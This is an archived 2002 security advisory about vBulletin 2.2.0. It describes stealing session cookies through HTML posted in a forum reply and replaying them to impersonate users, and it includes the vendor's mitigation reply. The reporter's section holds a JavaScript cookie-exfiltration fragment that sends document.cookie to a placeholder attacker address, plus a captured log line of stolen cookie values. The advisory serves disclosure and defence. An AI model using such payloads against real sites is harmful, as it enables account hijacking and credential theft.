Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web5057.htm

vBulletin stolen cookies can be used to impersonate other users



1st Feb 2002 [SBWID-5057]
COMMAND

	vBulletin stolen cookies can be used to impersonate other users

SYSTEMS AFFECTED

	vBulletin 2.2.0

PROBLEM

	Harry Metcalfe reported :
	

	First, I post some malicious html in a reply  to  a  topic  that  allows
	HTML:
	

	document.write(\'

	src=\"http://my_ip_address/\'+document.cookie+\'\">\';

	

	When someone loads the page,  the  javascript  echoes  the  contents  of
	their cookies into the image source tag that points to  a  webserver  on
	my machine, resulting in this kind of line in my access log:
	

	GET

	/bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a

	4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi

	sit=1011983161

	

	At first I thought this was useless  since  the  forum  uses  a  one-way
	encryption hash to protect the password...  however,  then  it  occurred
	that If I log out and clear my cookies, I can add these  variables  into
	the url of any page and the forum will use those variables to log me  in
	transparently, just like it ordinarily does when  you  leave  the  forum
	and come back. So I added the variables to the url and bingo, it  logged
	me in as a moderator of the forum, who was being my guinea pig.
	

	From here, I can log onto his  profile,  change  his  email  address  to
	mine, use the forgotten password utility to have  his  password  emailed
	to me. Obviously in this user\'s case this is fairly useless, but  if  I
	had  caught  an  administrator\'s  cookie  info   from   the   malicious
	javascript, I could get their password, giving me access  to  the  CP...
	and that\'s that.

SOLUTION

	John Percival [http://www.vbulletin.com/] replied :
	

	A more advanced hacker could also spoof the  cookies,  so  checking  the
	$HTTP_COOKIE_VARS / $_COOKIE array  would  not  be  any  more  effective
	against a determined attacker.
	

	Harry recommends turning off the [img] code  also.  This  is  absolutely
	not necessary as we have very tight checks on what  is  allowed  in  the
	[img] tag, and Javascript cannot be used  in  there.  However,  allowing
	HTML code entered by the user is always going to have to rely on  trust.
	Scripting  can  be  used  in  almost  any  element   (eg.   <script>,
	<style>, <img>, <body>, <a>), and if you want to  read  more
	on this, look at the recent discussions on the webappsec  mailing  list,
	also on SecurityFocus.com
	

	The bottom line is that if you do not completely and utterly  trust  the
	users of the bulletin board, HTML should not ever be  allowed.  That  is
	why we have that option turned off by default.
	

	Just as a quick aside, it is possible to define  your  own  custom  \'vB
	Code\'  tags,  like  the  [img]  tag,  which  should  allow  you  to  do
	everything that enabling HTML does, and much more.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH